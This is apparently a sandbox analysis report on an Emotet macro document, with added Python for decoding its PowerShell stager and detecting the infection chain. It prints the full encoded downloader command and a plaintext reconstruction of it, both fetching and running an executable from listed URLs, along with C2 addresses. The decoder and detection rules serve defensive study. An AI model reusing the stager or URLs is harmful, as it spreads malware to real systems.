Analysis

  • max time kernel
    57s
  • max time network
    66s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    17-07-2020 18:06

General

  • Target

    a721a61fa7fea85fc4bd19f57585f03699ee0fc58d003432e9669f985f90817f.doc

  • Size

    196KB

  • MD5

    629b66fbf0b163240f096727d281ebd1

  • SHA1

    549b7d1a7e0a26bd368d1df9d2918d85164db1b4

  • SHA256

    a721a61fa7fea85fc4bd19f57585f03699ee0fc58d003432e9669f985f90817f

  • SHA512

    68c19e821143ea009366ee1d9e02abe72fb9f17e58052bdd5eedd432b53f8a10046558ff1bd3a70b31b520598d93f68f4e51fbde506b5bfed64f3601a3dbb06b

Malware Config

Extracted

  • Language
    ps1
  • Source
  • URLs (exe.dropper)
    http://topgameus.com/AutoIT_UngdungOnline/zqjqel/
    http://cpads.net/7iuhq/mri/
    https://tyres2c.com/wp-admin/zu2h/
    https://thesuperservice.com/wp-admin/rL00/
    https://ssuse.com/wp-content/uploads/IMv2xyEc3/
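The URL list above is what the sandbox's config extractor recovered from the macro's PowerShell stage, i.e. the base64 argument of the `powersheLL -e` command recorded under Processes. The following decoder is an added example, not part of this report and not the sandbox's or Emotet's code. SAMPLE_SCRIPT is constructed here to mirror the shape of that stage (backtick-split member names, a `*`-joined URL list split with `[char]42`, a numeric drop name under `$env:userprofile`, a size check, then `Win32_Process.Create`); its variable names are made up. The report's own blob can be passed to `extract_config()` unchanged.

```python
"""Decode and unpick an Emotet-style PowerShell -e (EncodedCommand) stager."""
import base64
import json
import re

# Constructed stand-in for the macro's PowerShell stage (same structure as the
# command in the report; variable names are invented for this example).
SAMPLE_SCRIPT = (
    "$a='junk';[Net.ServicePointManager]::\"SeC`URiTy`pROtOc`ol\" = 'tls12, tls11, tls';"
    "$n = '677';$p=$env:userprofile+'\\'+$n+'.exe';"
    "$w=.('new-obj'+'e'+'ct') NeT.weBCLiEnT;"
    "$u='http://topgameus.com/AutoIT_UngdungOnline/zqjqel/*http://cpads.net/7iuhq/mri/"
    "*https://tyres2c.com/wp-admin/zu2h/*https://thesuperservice.com/wp-admin/rL00/"
    "*https://ssuse.com/wp-content/uploads/IMv2xyEc3/'.\"sp`Lit\"([char]42);"
    "foreach($x in $u){try{$w.\"D`oWnLO`AdF`ilE\"($x, $p);"
    "If ((&('Ge'+'t-Ite'+'m') $p).\"Le`NG`Th\" -ge 36764) "
    "{([wmiclass]'win32_Process').\"CrEa`Te\"($p);break}}catch{}}"
)


def encode_command(script: str) -> str:
    """What `powershell -e` expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command. Whitespace from copy-paste line wrapping is
    dropped first; both the base64 and the UTF-16LE decode fail loudly on garbage."""
    clean = re.sub(r"\s+", "", blob)
    return base64.b64decode(clean, validate=True).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Strip the cosmetic obfuscation this stager uses:
    - backticks inside quoted member names  ("D`oWnLO`AdF`ilE" -> DownloadFile)
    - concatenated command names            (('Ge'+'t-Ite'+'m') -> Get-Item)
    - quoted member access                  (."spLit"( -> .spLit(, ::"x" -> ::x)
    Letter case is left alone: PowerShell is case-insensitive, so the regexes
    in extract_config() match case-insensitively instead."""
    s = script.replace("`", "")
    s = re.sub(r"\(((?:'[^']*'\+)+'[^']*')\)",
               lambda m: m.group(1).replace("'+'", "").strip("'"), s)
    s = re.sub(r'(\.|::)"([A-Za-z0-9_]+)"', r"\1\2", s)
    return s


def extract_config(blob: str) -> dict:
    """Pull the indicators an analyst wants out of an encoded stager."""
    s = deobfuscate(decode_command(blob))
    urls = []
    m = re.search(r"'(https?://[^']*)'\.split\(\[char\]42\)", s, re.IGNORECASE)
    if m:
        urls = m.group(1).split("*")  # [char]42 is '*'
    drop_path = None
    m = re.search(r"\$env:userprofile\+'\\'\+\$(\w+)\+'\.exe'", s, re.IGNORECASE)
    if m:  # resolve the variable that holds the numeric file name
        v = re.search(r"\$" + re.escape(m.group(1)) + r"\b\s*=\s*'([^']*)'", s)
        if v:
            drop_path = "%USERPROFILE%\\" + v.group(1) + ".exe"
    m = re.search(r"\.length\s+-ge\s+(\d+)", s, re.IGNORECASE)
    min_size = int(m.group(1)) if m else None  # reject HTML error pages / short files
    downloader = None
    if re.search(r"\.downloadfile\(", s, re.IGNORECASE):
        downloader = "Net.WebClient.DownloadFile"
    exec_via = None
    if re.search(r"\[wmiclass\]'win32_process'\)\.create\(", s, re.IGNORECASE):
        exec_via = "WMI Win32_Process.Create"  # child is not parented to powershell
    return {"urls": urls, "drop_path": drop_path, "min_size": min_size,
            "downloader": downloader, "exec_via": exec_via}


if __name__ == "__main__":
    print(json.dumps(extract_config(encode_command(SAMPLE_SCRIPT)), indent=2))
```

The `Win32_Process.Create` launch is worth noting for triage: the dropped executable is started by WMI rather than by the PowerShell process, which is why the report shows `677.exe` at the top level of the process tree rather than as a child of `powersheLL.exe`.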

Extracted

  • Family
    emotet
  • C2
    109.117.53.230:443
    212.51.142.238:8080
    190.160.53.126:80
    139.59.60.244:8080
    91.211.88.52:7080
    190.108.228.62:443
    186.208.123.210:443
    46.105.131.87:80
    173.91.22.41:80
    222.214.218.37:4143
    31.31.77.83:443
    62.75.141.82:80
    93.156.165.186:80
    93.51.50.171:8080
    185.94.252.104:443
    78.189.165.52:8080
    95.179.229.244:8080
    73.11.153.178:8080
    203.153.216.189:7080
    95.213.236.64:8080
  • rsa_pubkey.plain

Signatures

  • Blacklisted process makes network request 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies registry class 280 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a721a61fa7fea85fc4bd19f57585f03699ee0fc58d003432e9669f985f90817f.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1460
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYAdwBpAGEAdABoAHQAYQBlAGcAcABvAHUAbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAUgBpAFQAeQBgAHAAUgBPAHQATwBjAGAAbwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAdABoAGUAZQBjAGgAaABvAGEAeABiAGEAaQBuAGwAbwBoAHIAZQB1AGcAcABvAGEAcQB1ACAAPQAgACcANgA3ADcAJwA7ACQAYwBoAGEAaQB4AHcAZQBlAHgAPQAnAHgAYQBvAHMAJwA7ACQAYwBoAGEAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdABoAGUAZQBjAGgAaABvAGEAeABiAGEAaQBuAGwAbwBoAHIAZQB1AGcAcABvAGEAcQB1ACsAJwAuAGUAeABlACcAOwAkAGoAZQBhAG0AYwBoAGEAYgA9ACcAcQB1AGEAZQBmAHkAbwB1AGwAcABvAHUAdwBqAGEAaQBoAHQAdQBhAHIAJwA7ACQAdABoAGEAZQBxAHUAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AdwBlAEIAQwBMAGkARQBuAFQAOwAkAHQAaQBhAGcAeQBvAHUAcwB2AHUAdQBiAD0AJwBoAHQAdABwADoALwAvAHQAbwBwAGcAYQBtAGUAdQBzAC4AYwBvAG0ALwBBAHUAdABvAEkAVABfAFUAbgBnAGQAdQBuAGcATwBuAGwAaQBuAGUALwB6AHEAagBxAGUAbAAvACoAaAB0AHQAcAA6AC8ALwBjAHAAYQBkAHMALgBuAGUAdAAvADcAaQB1AGgAcQAvAG0AcgBpAC8AKgBoAHQAdABwAHMAOgAvAC8AdAB5AHIAZQBzADIAYwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AegB1ADIAaAAvACoAaAB0AHQAcABzADoALwAvAHQAaABlAHMAdQBwAGUAcgBzAGUAcgB2AGkAYwBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwByAEwAMAAwAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBzAHUAcwBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAEkATQB2ADIAeAB5AEUAYwAzAC8AJwAuACIAcwBwAGAATABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABiAG8AdQBtAHkAYQBvAG0AaABvAGkAegBqAGUAaQBuAGYAZQBpAHYAPQAnAGYAaQBvAHQAaABnAG8AZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeABlAGUAeABjAGUAYwBoACAAaQBuACAAJAB0AGkAYQBnAHkAbwB1AHMAdgB1AHUAYgApAHsAdAByAHkAewAkAHQAaABhAGUAcQB1AC4AIgBEAGAAbwBXAG4ATABPAGAAQQBkAEYAYABpAGwARQAiACgAJAB4AGUAZQB4AGMAZQBjAGgALAAgACQAYwBoAGEAeQApADsAJABtAGEAZQByAGIAbwBlAHAAYwB1AGEAZwA9ACcAdgBlAGEAYgB0AHUAcAByAHUAdQBsAGMAaABpAGEAegBiAG8AYQBoACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAYwBoAGEAeQApAC4AIgBMAGUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA2ADcANgA0ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAHIARQBhAGAAVABlACIAKAAkAGMAaABhAHkAKQA7ACQAYwBlAGMAaABjAGEAdQB0AHQAaABlAG8AcQB1AHMAbwBlAG0APQAnAGoAbwBpAGsAagBvAGEAcABkAGkAZQBzACcAOwBiAHIAZQBhAGsAOwAkAGcAYQB1AGcAeQB1AHkAcgB1AHkAeQB1AG4AYgB1AHUAZgBrAGUAcgA9ACcAdABpAGEAdwBmAGUAbwBjAGYAYQBpAHMAagBhAGUAZgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABwAGkAeAB3AHUAegB2AG8AYQBtAGwAdQB1AHMAagBvAG8AeQBrAGkAbQA9ACcAcwBpAGMAaABrAGUAaQBnAHYAbwBhAGMAJwA=
    1⤵
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    PID:1760
  • C:\Users\Admin\677.exe
    C:\Users\Admin\677.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    PID:1588
    • C:\Windows\SysWOW64\rdpcore\VAN.exe
      "C:\Windows\SysWOW64\rdpcore\VAN.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1992
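The process tree above carries the traits a detection engineer would key on: a PowerShell launch with a base64 `-e` argument (and a mixed-case image name, `powersheLL.exe`, that defeats naive case-sensitive matching), a dropped executable with a purely numeric name in the root of the user profile, and a second-stage binary running from a non-standard subfolder of `SysWOW64`. The following detection pass is an added example, not part of this report. Its events are constructed from the tree above in Sysmon Event ID 1 style (field names are an assumption); the page does not show the parent of `powersheLL.exe` or of `677.exe`, so `WmiPrvSE.exe` is assumed for both here (the decoded stager starts `677.exe` via `Win32_Process.Create`, consistent with it appearing at the top level), and the encoded command is truncated to its first 80 characters.

```python
"""Rule-based pass over process-creation events for the chain in this report."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the prefix and insist on a long base64 run after it.
ENCODED_CMD = re.compile(r"(?:^|\s)-e[a-z]{0,13}\s+[A-Za-z0-9+/=]{40,}", re.IGNORECASE)
# <profile root>\<digits>.exe, e.g. C:\Users\Admin\677.exe
NUMERIC_PROFILE_EXE = re.compile(r"^[a-z]:\\users\\[^\\]+\\\d+\.exe$", re.IGNORECASE)
# exe one folder below System32/SysWOW64, e.g. ...\SysWOW64\rdpcore\VAN.exe
SYSTEM_SUBDIR_EXE = re.compile(
    r"^[a-z]:\\windows\\sys(?:tem32|wow64)\\([^\\]+)\\[^\\]+\.exe$", re.IGNORECASE)
KNOWN_SYSTEM_SUBDIRS = {"wbem", "drivers", "spool"}  # assumed baseline; tune per estate

# Constructed from the report's process tree; explorer.exe and WmiPrvSE.exe parents
# are assumptions (the page does not show them).
SAMPLE_EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1460, 1000, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
              r'"C:\Users\Admin\AppData\Local\Temp\a721a61fa7fea85fc4bd19f57585f03699ee0fc58d003432e9669f985f90817f.doc"'),
    ProcEvent(900, 4, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe"),
    ProcEvent(1760, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe",
              "powersheLL -e JABiAGEAZQBwAHQAbwB1AHAAbQBvAHoAcQB1AGEAcQB1AGcAdQByAD0AJwBnAGEAaQByAGYAbwBvAHYA"),
    ProcEvent(1588, 900, r"C:\Users\Admin\677.exe", r"C:\Users\Admin\677.exe"),
    ProcEvent(1992, 1588, r"C:\Windows\SysWOW64\rdpcore\VAN.exe", r'"C:\Windows\SysWOW64\rdpcore\VAN.exe"'),
]


def basename(path: str) -> str:
    # Lower-cased on purpose: "powersheLL.exe" is the same binary as powershell.exe.
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return {pid: [rule, ...]} for every event that trips at least one rule."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        rules = []
        if pimg in OFFICE_APPS and img in SCRIPT_HOSTS:
            rules.append("office_spawns_script_host")
        if pimg == "wmiprvse.exe" and (img in SCRIPT_HOSTS or NUMERIC_PROFILE_EXE.match(e.image)):
            rules.append("wmi_spawned_suspicious_child")
        if img == "powershell.exe" and ENCODED_CMD.search(e.cmdline):
            rules.append("powershell_encoded_command")
        if NUMERIC_PROFILE_EXE.match(e.image):
            rules.append("numeric_exe_in_profile_root")
        m = SYSTEM_SUBDIR_EXE.match(e.image)
        if m and m.group(1).lower() not in KNOWN_SYSTEM_SUBDIRS:
            rules.append("exe_in_unusual_system_subdir")
        if rules:
            hits[e.pid] = rules
    return hits


if __name__ == "__main__":
    for pid, rules in detect(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

Matching on the lowercased image name and on an abbreviated `-e` switch is the point of the first two rules: both the `powersheLL` spelling and the short switch are cheap evasions of string-literal detections. The `KNOWN_SYSTEM_SUBDIRS` allowlist is deliberately small; in production it should be built from a baseline of the estate's own System32/SysWOW64 layout, since legitimate binaries do live one level down (e.g. `wbem\WmiPrvSE.exe`).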

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1460-2-0x0000000008820000-0x0000000008824000-memory.dmp

    Filesize

    16KB

  • memory/1460-3-0x0000000006DF0000-0x0000000006FF0000-memory.dmp

    Filesize

    2.0MB

  • memory/1460-4-0x000000000ABA0000-0x000000000ABA4000-memory.dmp

    Filesize

    16KB

  • memory/1460-5-0x000000000BC20000-0x000000000BC24000-memory.dmp

    Filesize

    16KB

  • memory/1460-6-0x0000000006DF0000-0x0000000006FF0000-memory.dmp

    Filesize

    2.0MB

  • memory/1460-7-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1588-10-0x00000000002F0000-0x00000000002FC000-memory.dmp

    Filesize

    48KB

  • memory/1992-13-0x00000000003E0000-0x00000000003EC000-memory.dmp

    Filesize

    48KB